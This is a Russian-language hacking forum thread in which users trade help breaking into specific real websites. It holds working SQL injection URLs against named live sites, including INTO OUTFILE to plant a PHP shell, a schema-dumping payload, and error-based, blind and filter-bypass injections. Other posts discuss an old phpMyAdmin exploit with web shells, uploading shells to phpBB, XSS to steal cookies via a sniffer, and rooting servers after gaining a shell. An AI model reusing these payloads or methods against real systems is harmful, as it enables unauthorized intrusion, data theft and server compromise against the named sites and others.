http://www.ourkids.net/camp/camp-profile-agate.php?id=-710%27%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2 ,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6 ,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,1 0,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3, 4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20%20into%20ou tfile%20%27/var/www/html/ourkids.net/images/shell.php%27%20%20--%20/*

Друзья, кто поможет залиться? Суть проблемы: путь к директориям верный, но мускул выдает ошибку как-будто директории не существует (Errcode: 2), хотя директории реально существуют, и если нет прав на запись, то должна быть (Errcode: 13). Пробовал в разные директории. Результат один. Вообщем смотрите сам и все поймете.

Dr.Strangelove said:

Code:
http://www.ourkids.net/camp/camp-profile-agate.php?id=-710%27%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2 ,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6 ,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,1 0,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3, 4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20%20into%20ou tfile%20%27/var/www/html/ourkids.net/images/shell.php%27%20%20--%20/*

Друзья, кто поможет залиться? Суть проблемы: путь к директориям верный, но мускул выдает ошибку как-будто директории не существует (Errcode: 2), хотя директории реально существуют, и если нет прав на запись, то должна быть (Errcode: 13). Пробовал в разные директории. Результат один. Вообщем смотрите сам и все поймете.


Сам сайт и бд находится на разных серверах.

инъекция в post запрос

в таком виде a"");mysql_query("update xxx set login='22223' where login='2222'");

выдает ошибку вида - "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update xxx set login='22223' where login='2222'");"' at line 1"

а если так a"");mysql_query(update xxx set login='22223' where login='2222');

то пост запрос выполняется, но айпейта не происходит.

подскажите в чем трабл

ребят,подскажите,плз...как скормить sqlmap'у блайнд-скулю типа этой (suffix .html)

http://site.com/common/[sql-inj].html

havij её норм берет,как http://site.com/common/%Inject_Here%.html

и где можно почитать про suffix и prefix в скулях...искал в сети,ничего норм не нашел...?

Подскажите,пожалуйста

что делаю не так?


Code:
13+union+select+1,2,table_name,4,5,6,7,8,9,10+from +information_schema.tables+limit+39,1--

Такой запрос выдает в один список всю базу information_schema и базу сайта.

Собственно вопрос! Каким запросом посмотреть соседние базы если юзер имеет к ним доступ?

cipa21 said:
что делаю не так?

Code:
13+union+select+1,2,table_name,4,5,6,7,8,9,10+from +information_schema.tables+limit+39,1--

Такой запрос выдает в один список всю базу information_schema и базу сайта.
Собственно вопрос! Каким запросом посмотреть соседние базы если юзер имеет к ним доступ?


Попробуй в выводимое поле вставить такой шаблон:


(select(@x)from(select(@x:=0x00),(select(0)from(in formation_schema.columns)where(table_schema!=0x696 e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:= concat(@x,0x3c62723e,table_schema,0x2e,table_name, 0x3a,column_name))))x)


P.S: а вот и примерчик вставки такого блока.


http://www.school.net.th/schoolnet/article/read.php?article_id=-518+UnIon+selECt+1,2,3,concat_ws(0x3a,user(),versi on(),database()),5,6,7,8,9,10,1111,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,(select(@x) from(select(@x:=0x00),(select(0)from(information_s chema.columns)where(table_schema!=0x696e666f726d61 74696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0 x3c62723e,table_schema,0x2e,table_name,0x3a,column _name))))x),31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100,101,102,103,104,105,106,107 ,108,109,110,111,112,113,114,115,116,117,118,119,1 20,121,122,123,124,125,126,127,128,129,130,131,132 ,133,134,135+--+

Ребят помогите разобраться

Есть phpmyadmin 2.11.2.2

Нашел старый сплоит [URL="https://antichat.live/threads/262582/"]phpMyAdmin */

запустил https://127.0.0.1/phpmyadmin/exp.php он мне выдал phpinfo но наверху пишет что есть ошибка в 19 строке $query = $parsed_url['query'];

Затем в шеле вместо подставлял "Antichat shell" и "R57Shell" вижу их дерикторию phpmyadmin с файлами с правами -rw-rw-rw- но ничего там не работает и начал ругаться еще и на это:

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\core.lib.p hp on line 558

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 75

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 76

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 77

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 78

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 84

Что делаю не так ?

dynda2000 said:
Ребят помогите разобраться
Есть phpmyadmin 2.11.2.2
Нашел старый сплоит
[URL="https://antichat.live/threads/262582/"]phpMyAdmin */
запустил
https://127.0.0.1/phpmyadmin/exp.php
он мне выдал phpinfo но наверху пишет что есть ошибка в 19 строке $query = $parsed_url['query'];
Затем в шеле вместо подставлял "Antichat shell" и "R57Shell" вижу их дерикторию phpmyadmin с файлами с правами -rw-rw-rw- но ничего там не работает и начал ругаться еще и на это:
Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\core.lib.p hp on line 558
Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 75
Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 76
Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 77
Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 78
Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.cla ss.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 84
Что делаю не так ?


лей сразу непосредственно шелл

попугай said:
лей сразу непосредственно шелл


Подскажи как это делается? если не затруднит

HeaVeNSeR said:
ребят,подскажите,плз...как скормить sqlmap'у блайнд-скулю типа этой (suffix .html)
http://site.com/common/
[sql-inj]
.html
havij её норм берет,как http://site.com/common/
%Inject_Here%
.html
и где можно почитать про suffix и prefix в скулях...искал в сети,ничего норм не нашел...?
Подскажите,пожалуйста


В sqlmap поставьте * в том месте где уязвимость.

Пример: http://site.com/common/*.html

to dynda2000

Почитайте про system(wget/fetch), там же сразу и file_put_contents() и выбирайте как Вам больше по душе!

w3af нашёл уязвимость (ocCommanding), первый раз с ней сталкиваюсь как с ней работать?

Всем привет, вобщем такой вопрос

есть скуля в пост запросе

на страницу выводит три ошибки

id=2'


Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home//public_html/new_stavka.php on line 65
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home//public_html/new_stavka.php on line 71
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/public_html/new_stavka.php on line 75



начинаю подбирать колонки

на трёх

id=2'+union+select+1,2,3--+

выводит только одну ошибку

mysql_fetch_array()

и обычный текст страницы(прямого вывода на станицу нету), дальше перебераю и имею все теже три ошибки, собствено, дальше крутить нету смысла, как я дальше в таком случае могу получить какойю либо инфу из БД в таком случае?

qaz, error based методом попробывать мб ?

bodrich said:
qaz
, error based методом попробывать мб ?


ето не тот вывод об ошибке когда юзают error based

justonline said:
нашел по сути банальную xss в input.
проблема состоит в том, что ничего не фильтруется кроме двойного слеша в ссылке на снифер. // - удаляет. если ///, то оставляет один... дальнейшие манипуляции с слешом не приносят успехов.
знатоки Js, подскажите пожалуйста возможную реализацию, что бы ссылка не фильтровалась. Мне для общего развития, уязвимость все-равно админам сдам. я уже пол ночи сижу и мучаюсь... и табуляцию режет между этими слешами и пробелы.
где то проскакивал способ через eval, но я не осилил.
+ ограничение на 100 символов.
+ работа только в пределах тега


никто не может помочь?)

justonline said:
никто не может помочь?)


что на счет того чтоб перевести в урленкод?, или криптованую ссылку где не использауется двойные слеши? вариантов уйма, блескни умом, вопрос достаточно бонален воспользуйся гуглом!!!

Нашел XSS в post запросе, если я правильно понял то это активка, что через неё сделать можно, если есть полная свобода:

+ни чего ни фильтруется

+работают script src=lyaya.js

и т.д.

Как победить?


PHP:
tabu72.ru/catalog/93)+union+select+1+--+

Выдает


Code:
user warning: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near 'group by td.name' at line 9 query:
catalog_taxonomy_select_brands /* Гость :
catalog_taxonomy_select_brands */ SELECT td.tid, td.name
FROM term_node tn left join term_node tnn on tn.nid = tnn.nid
left join term_data td on td.tid = tnn.tid left join node n on tn.nid
= n.nid left join content_type_tovar tt on tn.nid = tt.nid WHERE
tn.tid in ( 93) union select 1 -- ) and tnn.tid not in ( 93) union
select 1 -- ) group by td.name in /var/www/sites/tabu72.ru/sites/
all/modules/catalog/catalog.module on line 895. user warning:
The used SELECT statements have a different number of columns
query: pager_query /* Гость : pager_query */ SELECT tn.nid,
td.name, td.tid FROM term_node tn left join term_node tnn on
tn.nid = tnn.nid left join term_data td on td.tid = tnn.tid left join
node n on tn.nid = n.nid left join content_type_tovar tt on tn.nid
= tt.nid WHERE tn.tid in ( 93) union select 1 -- ) and tnn.tid not in
( 93) union select 1 -- ) and IFNULL(tt.field_price_sale_value,
0)=0 and tt.field_dateupdate_value is NULL order by n.title asc
LIMIT 0, 12 in /var/www/sites/tabu72.ru/sites/all/modules/
catalog/catalog.module on line 814.

Параметр используется во множественных запросах. Если добавить еще 1 колонку, то появятся еще 2 ошибки

Vanzent said:
Как победить?

PHP:
tabu72.ru/catalog/93)+union+select+1+--+

Выдает

Code:
user warning: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near 'group by td.name' at line 9 query:
catalog_taxonomy_select_brands /* Гость :
catalog_taxonomy_select_brands */ SELECT td.tid, td.name
FROM term_node tn left join term_node tnn on tn.nid = tnn.nid
left join term_data td on td.tid = tnn.tid left join node n on tn.nid
= n.nid left join content_type_tovar tt on tn.nid = tt.nid WHERE
tn.tid in ( 93) union select 1 -- ) and tnn.tid not in ( 93) union
select 1 -- ) group by td.name in /var/www/sites/tabu72.ru/sites/
all/modules/catalog/catalog.module on line 895. user warning:
The used SELECT statements have a different number of columns
query: pager_query /* Гость : pager_query */ SELECT tn.nid,
td.name, td.tid FROM term_node tn left join term_node tnn on
tn.nid = tnn.nid left join term_data td on td.tid = tnn.tid left join
node n on tn.nid = n.nid left join content_type_tovar tt on tn.nid
= tt.nid WHERE tn.tid in ( 93) union select 1 -- ) and tnn.tid not in
( 93) union select 1 -- ) and IFNULL(tt.field_price_sale_value,
0)=0 and tt.field_dateupdate_value is NULL order by n.title asc
LIMIT 0, 12 in /var/www/sites/tabu72.ru/sites/all/modules/
catalog/catalog.module on line 814.

Параметр используется во множественных запросах. Если добавить еще 1 колонку, то появятся еще 2 ошибки


http://tabu72.ru/catalog/93)or(select(1)from(select+count(0),concat((select (concat_ws(0x3b,user(),version()))),floor(rand(0)* 2))from(term_node)+group+by+2)a)--+

mr_zedox said:
Нашел XSS в post запросе, если я правильно понял то это активка, что через неё сделать можно, если есть полная свобода:
+ни чего ни фильтруется
+работают script src=lyaya.js
и т.д.


отсылать куки на сервер или подгружать айфрейм сниффер.

Melfis said:
отсылать куки на сервер или подгружать айфрейм сниффер.


При запросе с document.cookie выводит билеберду, что-то похожее на md5, вот так:

http://fotoflexer.com/Normal/temp2/e44aaef60881b76862cb3acba5f7aab9.jpg

Столкнулся с проблемой.

есть сайт кпримеру antichat.ru, на нем куча поддоменов.

на video.antichat.ru у меня есть шелл, но до самого antichat.ru докопаться не могу((

также нашел на другом поддомене к примеру на forum.antichat.ru LFI. глянул в /etc/passwd

они окозались разные тоесть ни такой же как на video.antichat.ru на котором у меня шелл.

Sleep said:
Столкнулся с проблемой.
есть сайт кпримеру antichat.ru, на нем куча поддоменов.
на video.antichat.ru у меня есть шелл, но до самого antichat.ru докопаться не могу((
также нашел на другом поддомене к примеру на forum.antichat.ru LFI. глянул в /etc/passwd
они окозались разные тоесть ни такой же как на video.antichat.ru на котором у меня шелл.



А кто сказал, что они физически в одном месте располагаются?) НАчать с того, что на уровне DNS может на другие IP отсылаться и заканчивая всякими технологиями виртуализациями и ретрансляторами по принципу балансеров.

А кто сказал, что они физически в одном месте располагаются?)


Это можно предположить с помощью reverse ip.


Столкнулся с проблемой.
есть сайт кпримеру antichat.ru, на нем куча поддоменов.
на video.antichat.ru у меня есть шелл, но до самого antichat.ru докопаться не могу((
также нашел на другом поддомене к примеру на forum.antichat.ru LFI. глянул в /etc/passwd
они окозались разные тоесть ни такой же как на video.antichat.ru на котором у меня шелл.


Рутай.

mix0x0 said:
Это можно предположить с помощью reverse ip.
Рутай.


Автор вопроса не предоставил данных reverse ip.

Но всем и так понятно, кто выше отписался, и кого вы прокомментировали, что в конкретном случае у Sleep'a, основной сайт и его поддомены физически разнесены по разным серверам. Да, так бывает, к сожалению, лол. И сей прискорбный факт ввел его в ступор.

Поддерживаю сарказм и легкую иронию всех выше отписавшихся по этому вопросу.

ребят,знает кто,чем можно сдампить данные через скулю(error-based) в хэдере client-ip?

sqlmap вроде как не справился...(

mix0x0 said:
Это можно предположить с помощью reverse ip.
Рутай.



И что reverseIP ? ФИзически - значит в локации единой как пространство данной конкретной ФС - а это вполне вмещает в себя тот же ксен и тп. И реверс будет один IP отдавать - а человек будет тупить и не понимать - отчего же ему выдает два разных passwd с одного хоста на одном IP

Ребята! подскажите сплоит для phpmyadmin 3.3.8 плииз

народ, как залить шел в phpBB 2.0.23??

есть возможность разрешать разширения, сделал разширения php разрешонним, но при заливки php файла пишет ошибку Ошибка закачки: Невозможно закачать вложение в ./images/db_337.php.

чёза бред, как быть?

qaz said:
народ, как залить шел в phpBB 2.0.23??
есть возможность разрешать разширения, сделал разширения php разрешонним, но при заливки php файла пишет ошибку Ошибка закачки: Невозможно закачать вложение в ./images/db_337.php.
чёза бред, как быть?


старый добрый метод кто отменял?

грузи через восстановление базы

Konqi said:
старый добрый метод кто отменял?
грузи через восстановление базы


там, нет встановления базы

http://www.rusmg.ru/php/content.php?id=6721+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19+--+


не могу вывести

shadowrun said:
не могу вывести


крути как блинд


http://www.rusmg.ru/php/content.php?id=6721+and+ascii(mid((select+table_na me+from+information_schema.tables+limit+0,1),1,1)) %3E=67+--+


первую букву я тебе уже нашел "C" - char(67)

http://www.printingmuseum.org/eventdetail.php?id=-74 union select 1,2,3,4,5,6,7,8,9,10,11

фильтрация union. есть какие-то варианты обойти кроме вслепую?

Dr.Strangelove said:
http://www.printingmuseum.org/eventdetail.php?id=-74 union select 1,2,3,4,5,6,7,8,9,10,11
фильтрация union. есть какие-то варианты обойти кроме вслепую?




Code:
http://www.printingmuseum.org/eventdetail.php?id=-74+union(select(1),2,3,version(),5,6,7,8,9,10,11)

Вы даже не пытались обойти!

shadowrun said:
не могу вывести


http://www.rusmg.ru/php/content.php?id=6721+and+0+union+select+1,version() ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--+


winstrool said:
крути как блинд


Классный совет, хеккер.

Что не так делаю?


http://www.med-ray.ru/view.php?ID=-195+union+select+1,2,3,4,5,group_concat(table_name ),7,8,9,10,11,12+from+information_schema.tables+wh ere+table_schema=%28medray%29+--+

mr_zedox said:
Что не так делаю?


в неправильном синтаксисе:

table_schema=(medray)

Вместо скобок тут должны быть кавычки (ну или кавычкни внутри скобок, в любом случае стринговый параметр надо обрамлять ими), а т.к. mq=on, то надо переводить в хекс имя бд medray (в нех формате кавычки не нужны)

table_schema=0x6d6564726179

или для примера

table_schema=(0x6d6564726179)